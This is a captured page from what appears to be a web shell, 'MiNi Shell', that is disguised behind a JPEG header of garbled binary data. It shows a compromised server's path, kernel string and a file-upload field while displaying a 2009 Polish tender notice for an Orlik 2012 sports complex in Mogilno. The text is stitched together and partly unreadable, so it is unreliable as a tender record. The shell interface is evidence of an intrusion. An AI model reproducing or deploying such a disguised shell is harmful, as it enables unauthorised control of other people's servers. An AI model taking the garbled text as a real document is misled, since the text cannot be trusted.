JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/151960-N-2009.html

<p class="kh_header"><b>Mogilno: Budowa kompleksu sportowego w ramach programu Orlik 2012 w Mogilnie.</b><br>
<b>Numer ogłoszenia: 151960 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Mogilna , ul. Gabriela Narutowicza 1, 88-300 Mogilno, woj. kujawsko-pomorskie, tel. 052 3185520, faks 052 3152693.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kompleksu sportowego w ramach programu Orlik 2012 w Mogilnie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest budowa  kompleksu sportowego w ramach programu Orlik 2012 w Mogilnie.

2.Przedmiot zamówienia obejmuje:
2.1. Budowę boiska do piłki nożnej o wymiarach 30,0 m x 62,0m o pow. całkowitej 1860m2 ( pole gry 26,0 x 56,0 m).
-podbudowa przepuszczalna,
-obrzeża betonowe na ławie betonowej oddzielające sąsiednie elementy terenu od płyty boiska

Wszystkie elementy zgodne właściwościami określonymi w dokumentacji technicznej.
Roboty należy wykonać zgodnie z dokumentacją projektową (załącznik nr 3 do SIWZ) i SST1   (załącznik nr 2 do SIWZ)

Nawierzchnia do piłki nożnej.
nawierzchnia syntetyczna typu sztuczna trawa  o właściwościach i technologii układania określonych w
dokumentacji projektowej ( załącznik nr 3 do SIWZ) i SST (załącznik nr 2 do SIWZ)

Wyposażenie.
-bramki aluminiowe mocowane w tulejach - 2 sztuki
-siatki do bramek	- 2 sztuki

W projekcie przyjęto rozwiązanie nawierzchni sportowej jako nawierzchni z trawy syntetycznej. Składa się z włókien poliolefinowych, które wplecione są  we wzmocniony spód wykonany z polipropylenu i siatki poliestrowej. Wypełniana jest piaskiem kwarcowym oraz granulatem SBR.
Kolorystyka: trawa kolor zielony, linie białe
Charakterystyka włókna:
Skład : poliolefin 100%
Struktura: włókna monofil
Ciężar: min. 12 000 dtex
Grubość: min. 200 mikronów
Charakterystyka warstwy wierzchniej:
-wysokość włókna min.60 mm
-masa włókna brutto min 1400 g na m2
-ilość pęczków min 160 na m2 
-ilosć włókien: min 136 000 na m2
Charakterystyka podkładu:
-wytrzymałość na zrywanie : długość min.850N na 15% szer.min 1721 N na17%
-przepuszczalność wody: bez wypeł.większa niż 90 litrów na m2 na min
Charakterystyka materiału wypełniającego:
Piasek kwarcowy o zawartości krzemionki nie mniej jak 95%, płukany i suszony.
Ziarna powinny być zaokrąglone i odpowiadać normom kraju instalatora.
Granulacja piasku 0,2-0,8 mm.
Ilość do zasypania 18-22 kg na m2, granulat SBR 0,5 mm-2,5mm, 16-22 kg na m2 

Wykonawca winien zaproponować trawę o parametrach równych lub wyższych.

2.2.Budowę boiska wielofunkcyjnego o wymiarach 19,1 x 32,1 m o powierzchni 613,1 1m (pole do gry 15,1 x 28,1 m).

Podbudowa:
Podbudowa nieprzepuszczalna. 
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji projektowej (załącznik nr 3 do SIWZ).
Roboty należy wykonać zgodnie z dokumentacją projektową ( załącznik nr 3 do SIWZ) do i SST ( załącznik nr 2 do SIWZ).
Nawierzchnia boiska wielofunkcyjnego nawierzchnia poliuretanowa wykonana o właściwościach i technologii układania określonych w dokumentacji projektowej (załącznik nr 3 do SIWZ) i SST (załącznik nr 2 do SIWZ)
Technologie układania nawierzchni:
Technologia typu NATRYSK - na podbudowie z kruszywa kamiennego układa się warstwę nie przepuszczalną dla wody z asfaltobetonem. Następnie warstwę gr. 10-11 mm z granulatu SBR, następnie warstwę natrysku (mieszanka granulatu EPDM zmieszana z PU) o grubości 2-3mm.

Nawierzchnia poliuretanowa.

Podstawowe parametry eksploatacyjne dla nawierzchni o grubości 10-13 mm
Twardość nawierzchni 60 ? 5 Sh A
Wytrzymałość na rozciąganie wiieksza lub równa 0,75 Mpa
Wydłużenie przy zerwaniu wieksza lub równa 60 %
Wytrzymałość na rozdzieranie większa lub równa 110N
Ścieralność mniejsza lub równa 0,09 mm

Wyposażenie do piłki koszykowej
-obręcz do koszykówki standard i siatka do obręczy	- 2 sztuki
-tablica do koszykówki epoksydowa o wym. 105 x 180cm	- 2 sztuki
-mechanizm regulacji wysokości	- 2 sztuki

-konstrukcja do koszykówki dwusłupowa, montowana w tulejach	- 2 sztuki
Wyposażenie do piłki siatkowej.
-słupki do siatkówki, aluminiowe wielofunkcyjne (badminton, tenis, siatkówka)- 2 sztuki

-siatka do siatkówki                                                  - 1 sztuka

2.3.Ogrodzenie terenu.
Szczegółowe rozwiązania wg dokumentacji projektowej ( załącznik nr 3 do SIWZ) oraz SST (załącznik nr 2 do SIWZ).
2.4.Oświetlenie terenu.
Oświetlenie obiektu będą stanowiły projektory zamocowane na 8 masztach o wysokości min. 12 m. Szczegółowe rozwiązania wg dokumentacji projektowej (załącznik nr 3 do SIWT) oraz SST (załącznik nr 2 do SIWZ).
2.5.Chodniki.
Ciągi komunikacyjne i powierzchnia przeznaczona pod kontener (na odpadki stałe) - kostka polbrukowa gr. min 6 cm, na podbudowie z piasku i kruszywa, zamknięta obrzeżem betonowym. Szczegółowe rozwiązania wg dokumentacji projektowej (załącznik nr 3 do SIWZ) oraz SST ( zał. Nr 2 do SIWZ).

1 Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót
                                                       
2.6.Budynek modułowy zaplecza sanitarno-szatniowego wraz z fundamentami.
Budynek zaplecza na bazie systemu modułowego, fundamenty i roboty związane z ich wykonaniem należy wykonać zgodnie z dokumentacją projektową ( załącznik nr 3 do SIWZ) i SST (załącznik nr 2 do SIWZ.)

Zmiany Techniczne w budynku zaplecza socjalnego.

Zamawiający  wymaga uwzględnienia przy dostawie budynku socjalnego następujących elementów:
-świetliki dachowe-akrylowe, kopułowe, podwójne, na podstawie z laminatu poliestrowego ocieplanego, wys. 150 mm, nie otwierane, mleczne.
-wentylacja: grawitacyjna-czerpnia, wywiew mechaniczny, wyprowadzenie wentylatorów mechanicznych wywiewnych w poszczególnych pomieszczeniach w ścianach zewnętrznych pod okapami (nie połaci dachowej), należy zastosować wentylatory wyposażone w żaluzje. 
Należy zastosować czujnik ruchu jako element załączający wentylator.
-system grzewczy - grzejniki elektryczne w pomieszczeniach
-zastosować 2 % pochylenie dachu na zewnątrz. Rynna powinna być zamaskowana ozdobna listwą czołową.
-dodatkowego wprowadzenia wentylacji górnej przestrzeni stropu dachu
-drzwi dla osób niepełnosprawnych o szerokości skrzydła 100 cm
-oddzielenie pomieszczenia z pisuarem przez zastosowanie ścianki grodzącej
-w pomieszczeniach higieniczno-sanitarnych w obrębie prysznica zastosować zgrzewalną wykładzinę ścienną a na podłogach w pozostałych pomieszczeniach zgrzewalną wykładziną podłogową. 

Do oferty należy dołączyć wizualizację proponowanego budynku socjalnego oraz deklarację producenta wystawioną na Wykonawcę inwestycji gwarantującą wykonanie i dostawę budynku zgodnie z oczekiwaniami Inwestora zawartymi w programie funkcjonalno - użytkowym w terminie 30 dni od dnia przekazania placu budowy. 
2.7.Szczegółowy opis przedmiotu zamówienia stanowią załączniki
Załącznik Nr 1 do SIWZ	Specyfikacja techniczna wykonania i odbioru robót
Załącznik Nr 2 do SIWZ	Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót
Załącznik Nr 3 do SIWZ	Dokumentacja projektowa
Załącznik Nr 4 do SIWZ	Przedmiary robót
Wymagany okres gwarancji na wykonane roboty ( materiały i robociznę) wynosi 36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.
Wymagany okres gwarancji na trawę syntetyczną - 60 miesięcy

UWAGA:

Wykonawca zobowiązany jest do dokonania wizji lokalnej w terenie oraz do zdobycia wszelkich informacji, które mogą być konieczne do prawidłowej wyceny wartości robót budowlanych, gdyż wyklucza się możliwość roszczeń Wykonawcy związanych z błędnym skalkulowaniem ceny lub pominięciem elementów niezbędnych do wykonania umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości:

Część   I :   14.100,00 zł


Część  II :   14.100,00 zł


Część III :    3.000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art. 22 ust. 1 ustawy Pzp.
1.1. Spełnienie warunków udziału odnoszących się do posiadania niezbędnej wiedzy i doświadczenia, dysponowania osobami zdolnymi do wykonania zamówienia oraz sytuacji finansowej i ekonomicznej zostanie ocenione według poniższych zasad :

1)   udokumentowanie należytego wykonania przez Wykonawcę, w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej    jednego boiska piłkarskiego o nawierzchni  z  trawy  syntetycznej   i jednego   boiska  z  nawierzchnią  poliuretanową
(wykonane w ramach jednej lub dwóch umów) z podaniem ich wartości, dat wykonania oraz odbiorców ; dotyczy Części II.
                      
2)potwierdzenie dysponowania osobami posiadającymi uprawnienia do kierowania robotami budowlanymi w specjalnościach:
a)	konstrukcyjno -budowlanej,
b)	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
c)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. dotyczy Części I i Części III.

3)	ubezpieczenie   Wykonawcy   od   odpowiedzialności   cywilnej   kontraktowej   w   zakresie działalności zgodnej z przedmiotem zamówienia o wartości nie mniejszej niż :
 a)   100 000 PLN dla Części I
 b)   100 000 PLN dla Części II
 c)    50 000 PLN dla Części III

                             

2.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia), w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty na poszczególne zadania.

3.	Zamawiający wezwie w trybie art.26 ust.3 ustawy Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 -Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 6 oraz Załącznik Nr 7 do niniejszej SIWZ.
1.W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 ustawy :
1)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2)Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3)Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2.W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia:
1)Wykaz wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego tj. przed terminem publikacji ogłoszenia o zamówieniu., a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednego boiska piłkarskiego o nawierzchni z trawy syntetycznej i jednego boiska z nawierzchnią poliuretanową (dopuszczalne jest wykazanie realizacji dwóch boisk w ramach jednej lub dwóch umów) z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania. Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.) . Wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 5 do niniejszej SIWZ oraz dołączyć oświadczenie wykonawcy dotyczące trawy syntetycznej jak zostanie ułożona na boisku piłkarskim zgodnie ze wzorem stanowiącym Załącznik nr 5a do niniejszej SIWZ dotyczy Części II.
2)Dokumenty  potwierdzające  posiadanie  uprawnień   budowlanych   do   kierowania  robotami budowlanymi przez wskazane osoby w zakresie niezbędnym do wykonania zamówienia w specjalnościach:
1) konstrukcyjno -budowlanej,
2) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,wodociągowych i kanalizacyjnych, 
3) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. oraz  zaświadczenia, wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis danej osoby na listę członków właściwej izby. dotyczy Części I i Części  III.

3.W   celu   potwierdzenia   spełnienia  warunku   znajdowania   się   przez   Wykonawcę   w   sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:

1) Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej we wskazanej wysokości.
Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.






2)Wykaz oświadczeń lub dokumentów potwierdzających spełnianie warunków jakościowych, które                             należy dołączyć do oferty:

A.Materiały na boisko z nawierzchnią syntetyczną (nawierzchnia poliuretanowa):
1.Certyfikat lub deklaracja zgodności z normą : PN-EN 14877:2008, lub aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub
wyniki badan specjalistycznego laboratorium badającego nawierzchnie sportowe np. Labosport., lub dokument równoważny.

2.Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.

3.Atest PZH dla ofiarowanej nawierzchni.

4.Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnie.



B.Dokumenty dotyczące nawierzchni z trawy syntetycznej:


1.Raport z badań przeprowadzonych przez laboratorium (Labosport lub ISA-Sport lub Sports Labs Ltd), dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów z Handbook of Test Methods for Football Turf (dostępny na FIFA.com).

2.Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub
aprobata techniczna ITB, lub 
rekomendacja techniczna ITB, lub
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd lub dokument równoważny. 

3.Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.

4.Atest PZH dla oferowanej nawierzchni.

5.Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.
   
  Pkt. A I B dotyczy Części II..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.mogilno.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Mogilnie
ul.Narutowicza 1
88-300 Mogilno
pokój nr 210.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2009 godzina 10:00, miejsce: Urząd Miejski w Mogilnie, ul.Narutowicza 1,88-300 Mogilno, pokój nr 106..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -usunięcie gruntu na głębokości ok. 70cm i nawiezienie piasku pod boisko do piłki nożnej i wielofunkcyjne
-wykonanie podbudowy z kruszyw łamanych pod płytę boiska do piłki nożnej o wymiarach 30x62m i o  
   grubości 20cm po zagęszczeniu.
-wykonanie podbudowy z kruszyw łamanych pod płytę boiska wielofunkcyjnego o wymiarach: 19,1x32,1 i 
   grubości 20cm po zagęszczeniu.
-wykonanie nawierzchni z asfaltobetonu zamkniętego o grubości 7cm pod warstwę poliuretanową na boisku 
   wielofunkcyjnym 
-dostawa i ułożenie obrzeży na ławie betonowej o długości 362 mb
-wykonanie ogrodzenia boisk i działki 
-wykonanie placów i chodników z (polbruku), gr. 6cm, pow. ~ 320m2

Pozycje przedmiaru: 1-9, 11-13, 16-26, 28-30, 57-60, 62-71..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -wykonanie nawierzchni boiska do piłki nożnej o wym. 30x62m z trawy syntetycznej  H min. 60mm- 1860m2
-wykonanie nawierzchni poliuretanowej gr. 10-13mm na boisku wielofunkcyjnym o pow. 613,11m2
-wykonanie piłkochwytów z siatki syntetycznej o pow. 360m2 oraz podwyższenie ogrodzenia z w.w siatki 
-dostawa i montaż urządzeń sportowych
-dostawa i zamontowanie kontenerowych budynków szatniowo-sanitarnych na studniach
-wykonanie fundamentów pod urządzenia sportowe 
-wykonanie przyłącza wodnego z PE o dł. 32mb i podłączenie do budynków zaplecza
-wykonanie przyłącza kanalizacji do studni kolektora z PCV O160 i O200 - ok. 83 mb i podłączenie do   
   budynku zaplecza 

Pozycje przedmiaru: 10, 14, 15, 27, 31-56, 61..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -wykonanie oświetlenia boisk sportowych na słupach 12- metrowych - 8szt.
-podłączenie instalacji elektrycznej do budynków zaplecza szatniowo-sanitarnych.

Pozycje przedmiaru: 72- 87..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com